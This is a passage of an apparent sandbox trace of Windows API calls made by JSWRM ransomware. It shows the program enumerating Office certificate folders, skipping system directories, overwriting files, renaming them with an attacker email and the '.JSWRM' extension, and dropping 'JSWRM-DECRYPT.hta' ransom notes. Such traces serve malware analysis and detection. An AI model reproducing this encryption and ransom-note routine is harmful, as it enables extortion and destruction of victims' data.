lpFileSize=0x345de58 | out: lpFileSize=0x345de58*=656) returned 1 [0130.717] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.717] ReadFile (in: hFile=0x264, lpBuffer=0x20b1f8, nNumberOfBytesToRead=0x290, lpNumberOfBytesRead=0x345de64, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesRead=0x345de64*=0x290, lpOverlapped=0x0) returned 1 [0130.719] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.719] WriteFile (in: hFile=0x264, lpBuffer=0x20b1f8*, nNumberOfBytesToWrite=0x290, lpNumberOfBytesWritten=0x345de60, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesWritten=0x345de60*=0x290, lpOverlapped=0x0) returned 1 [0130.719] CloseHandle (hObject=0x264) returned 1 [0130.719] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Certificates\\groove.net\\ManagedObjects\\SignedManagedObjects.cer" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\certificates\\groove.net\\managedobjects\\signedmanagedobjects.cer"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Certificates\\groove.net\\ManagedObjects\\SignedManagedObjects.cer.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\certificates\\groove.net\\managedobjects\\signedmanagedobjects.cer.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0130.722] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1b0f9971, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1b0f9971, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1b0f9971, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x290, dwReserved0=0x60002, dwReserved1=0x23650e, cFileName="SignedManagedObjects.cer", cAlternateFileName="SIGNED~1.CER")) returned 0 [0130.722] FindClose (in: hFindFile=0x231e00 | out: hFindFile=0x231e00) returned 1 [0130.722] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x186355ca, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x18681a5c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x18681a5c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x2494f0, cFileName="Servers", cAlternateFileName="")) returned 1 [0130.722] lstrcmpiW (lpString1="Servers", lpString2=".") returned 1 [0130.722] lstrcmpiW (lpString1="Servers", lpString2="..") returned 1 [0130.722] lstrcmpiW (lpString1="Servers", lpString2="...") returned 1 [0130.722] lstrcmpiW (lpString1="Servers", lpString2="windows") returned -1 [0130.722] lstrcmpiW (lpString1="Servers", lpString2="recovery") returned 1 [0130.722] lstrcmpiW (lpString1="Servers", lpString2="perflogs") returned 1 [0130.722] lstrcmpiW (lpString1="Servers", lpString2="documents and settings") returned 1 [0130.722] lstrcmpiW (lpString1="Servers", lpString2="$RECYCLE.BIN") returned 1 [0130.722] lstrcmpiW (lpString1="Servers", lpString2="system volume information") returned -1 [0130.722] lstrcmpiW (lpString1="Servers", lpString2="msocache") returned 1 [0130.722] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Certificates\\groove.net\\Servers\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\certificates\\groove.net\\servers\\jswrm-decrypt.hta")) returned 0xffffffff [0130.722] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0130.722] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b0bc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0130.722] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Certificates\\groove.net\\Servers\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\certificates\\groove.net\\servers\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0130.723] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.723] WriteFile (in: hFile=0x338, lpBuffer=0x345b1d0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b19c, lpOverlapped=0x0 | out: lpBuffer=0x345b1d0*, lpNumberOfBytesWritten=0x345b19c*=0x230c, lpOverlapped=0x0) returned 1 [0130.724] CloseHandle (hObject=0x338) returned 1 [0130.724] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Certificates\\groove.net\\Servers\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\certificates\\groove.net\\servers\\jswrm-decrypt.hta")) returned 0x20 [0130.724] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Certificates\\groove.net\\Servers\\*.*", lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x186355ca, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x18681a5c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4494973a, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x23650e, cFileName=".", cAlternateFileName="")) returned 0x231ac0 [0130.724] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0130.724] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x186355ca, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x18681a5c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4494973a, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x23650e, cFileName="..", cAlternateFileName="")) returned 1 [0130.724] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0130.725] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0130.725] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4494973a, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x4494973a, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x4494973a, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x23650e, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0130.725] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0130.725] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0130.725] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0130.725] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0130.725] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0130.725] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0130.725] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0130.725] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0130.725] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0130.725] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0130.725] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0130.725] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241010, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0130.725] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0130.725] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241100, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0130.725] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x18681a5c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x18681a5c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x18ad3e4a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3b0, dwReserved0=0x60002, dwReserved1=0x23650e, cFileName="Management.cer", cAlternateFileName="MANAGE~1.CER")) returned 1 [0130.725] lstrcmpiW (lpString1="Management.cer", lpString2=".") returned 1 [0130.725] lstrcmpiW (lpString1="Management.cer", lpString2="..") returned 1 [0130.725] lstrcmpiW (lpString1="Management.cer", lpString2="...") returned 1 [0130.725] lstrcmpiW (lpString1="Management.cer", lpString2="windows") returned -1 [0130.725] lstrcmpiW (lpString1="Management.cer", lpString2="recovery") returned -1 [0130.725] lstrcmpiW (lpString1="Management.cer", lpString2="perflogs") returned -1 [0130.725] lstrcmpiW (lpString1="Management.cer", lpString2="documents and settings") returned 1 [0130.725] lstrcmpiW (lpString1="Management.cer", lpString2="$RECYCLE.BIN") returned 1 [0130.725] lstrcmpiW (lpString1="Management.cer", lpString2="system volume information") returned -1 [0130.725] lstrcmpiW (lpString1="Management.cer", lpString2="msocache") returned -1 [0130.725] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Management.cer", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0130.725] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Management.cer", cchWideChar=14, lpMultiByteStr=0x345e1a0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Management.cer", lpUsedDefaultChar=0x0) returned 14 [0130.725] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Management.cer", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0130.725] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Management.cer", cchWideChar=14, lpMultiByteStr=0x345e170, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Management.cer", lpUsedDefaultChar=0x0) returned 14 [0130.726] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0130.726] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345dec4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0130.726] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Certificates\\groove.net\\Servers\\Management.cer" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\certificates\\groove.net\\servers\\management.cer"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x264 [0130.726] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x345de58 | out: lpFileSize=0x345de58*=944) returned 1 [0130.726] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.726] ReadFile (in: hFile=0x264, lpBuffer=0x230a00, nNumberOfBytesToRead=0x3b0, lpNumberOfBytesRead=0x345de64, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesRead=0x345de64*=0x3b0, lpOverlapped=0x0) returned 1 [0130.728] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.728] WriteFile (in: hFile=0x264, lpBuffer=0x230a00*, nNumberOfBytesToWrite=0x3b0, lpNumberOfBytesWritten=0x345de60, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesWritten=0x345de60*=0x3b0, lpOverlapped=0x0) returned 1 [0130.728] CloseHandle (hObject=0x264) returned 1 [0130.728] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Certificates\\groove.net\\Servers\\Management.cer" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\certificates\\groove.net\\servers\\management.cer"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Certificates\\groove.net\\Servers\\Management.cer.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\certificates\\groove.net\\servers\\management.cer.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0130.729] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x186355ca, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x186355ca, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x18ad3e4a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3de, dwReserved0=0x60002, dwReserved1=0x23650e, cFileName="RELAY.CER", cAlternateFileName="")) returned 1 [0130.729] lstrcmpiW (lpString1="RELAY.CER", lpString2=".") returned 1 [0130.729] lstrcmpiW (lpString1="RELAY.CER", lpString2="..") returned 1 [0130.729] lstrcmpiW (lpString1="RELAY.CER", lpString2="...") returned 1 [0130.729] lstrcmpiW (lpString1="RELAY.CER", lpString2="windows") returned -1 [0130.729] lstrcmpiW (lpString1="RELAY.CER", lpString2="recovery") returned 1 [0130.729] lstrcmpiW (lpString1="RELAY.CER", lpString2="perflogs") returned 1 [0130.729] lstrcmpiW (lpString1="RELAY.CER", lpString2="documents and settings") returned 1 [0130.729] lstrcmpiW (lpString1="RELAY.CER", lpString2="$RECYCLE.BIN") returned 1 [0130.729] lstrcmpiW (lpString1="RELAY.CER", lpString2="system volume information") returned -1 [0130.729] lstrcmpiW (lpString1="RELAY.CER", lpString2="msocache") returned 1 [0130.729] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RELAY.CER", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0130.729] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RELAY.CER", cchWideChar=9, lpMultiByteStr=0x345e1a0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RELAY.CER", lpUsedDefaultChar=0x0) returned 9 [0130.729] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RELAY.CER", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0130.729] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RELAY.CER", cchWideChar=9, lpMultiByteStr=0x345e170, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RELAY.CER", lpUsedDefaultChar=0x0) returned 9 [0130.729] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0130.729] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345dec4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0130.729] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Certificates\\groove.net\\Servers\\RELAY.CER" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\certificates\\groove.net\\servers\\relay.cer"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x264 [0130.730] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x345de58 | out: lpFileSize=0x345de58*=990) returned 1 [0130.730] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.730] ReadFile (in: hFile=0x264, lpBuffer=0x230a00, nNumberOfBytesToRead=0x3d0, lpNumberOfBytesRead=0x345de64, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesRead=0x345de64*=0x3d0, lpOverlapped=0x0) returned 1 [0130.732] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.732] WriteFile (in: hFile=0x264, lpBuffer=0x230a00*, nNumberOfBytesToWrite=0x3d0, lpNumberOfBytesWritten=0x345de60, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesWritten=0x345de60*=0x3d0, lpOverlapped=0x0) returned 1 [0130.732] CloseHandle (hObject=0x264) returned 1 [0130.732] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Certificates\\groove.net\\Servers\\RELAY.CER" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\certificates\\groove.net\\servers\\relay.cer"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Certificates\\groove.net\\Servers\\RELAY.CER.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\certificates\\groove.net\\servers\\relay.cer.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0130.734] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x186355ca, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x186355ca, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x18ad3e4a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3de, dwReserved0=0x60002, dwReserved1=0x23650e, cFileName="RELAY.CER", cAlternateFileName="")) returned 0 [0130.734] FindClose (in: hFindFile=0x231ac0 | out: hFindFile=0x231ac0) returned 1 [0130.734] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x186355ca, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x18681a5c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x18681a5c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x2494f0, cFileName="Servers", cAlternateFileName="")) returned 0 [0130.734] FindClose (in: hFindFile=0x231f40 | out: hFindFile=0x231f40) returned 1 [0130.734] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x447598d4, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x447598d4, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x447598d4, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x225316, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0130.735] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0130.735] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0130.735] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0130.735] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0130.735] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0130.735] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0130.735] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0130.735] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0130.735] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0130.735] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0130.735] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0130.735] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2412e0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0130.735] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0130.735] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2411c8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0130.735] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x186355ca, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1865b8d4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1865b8d4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x225316, cFileName="Verisign", cAlternateFileName="")) returned 1 [0130.735] lstrcmpiW (lpString1="Verisign", lpString2=".") returned 1 [0130.735] lstrcmpiW (lpString1="Verisign", lpString2="..") returned 1 [0130.735] lstrcmpiW (lpString1="Verisign", lpString2="...") returned 1 [0130.735] lstrcmpiW (lpString1="Verisign", lpString2="windows") returned -1 [0130.735] lstrcmpiW (lpString1="Verisign", lpString2="recovery") returned 1 [0130.735] lstrcmpiW (lpString1="Verisign", lpString2="perflogs") returned 1 [0130.735] lstrcmpiW (lpString1="Verisign", lpString2="documents and settings") returned 1 [0130.736] lstrcmpiW (lpString1="Verisign", lpString2="$RECYCLE.BIN") returned 1 [0130.736] lstrcmpiW (lpString1="Verisign", lpString2="system volume information") returned 1 [0130.736] lstrcmpiW (lpString1="Verisign", lpString2="msocache") returned 1 [0130.736] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Certificates\\Verisign\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\certificates\\verisign\\jswrm-decrypt.hta")) returned 0xffffffff [0130.736] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0130.736] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b424, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0130.736] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Certificates\\Verisign\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\certificates\\verisign\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0130.737] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.737] WriteFile (in: hFile=0x314, lpBuffer=0x345b538*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b504, lpOverlapped=0x0 | out: lpBuffer=0x345b538*, lpNumberOfBytesWritten=0x345b504*=0x230c, lpOverlapped=0x0) returned 1 [0130.738] CloseHandle (hObject=0x314) returned 1 [0130.738] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Certificates\\Verisign\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft 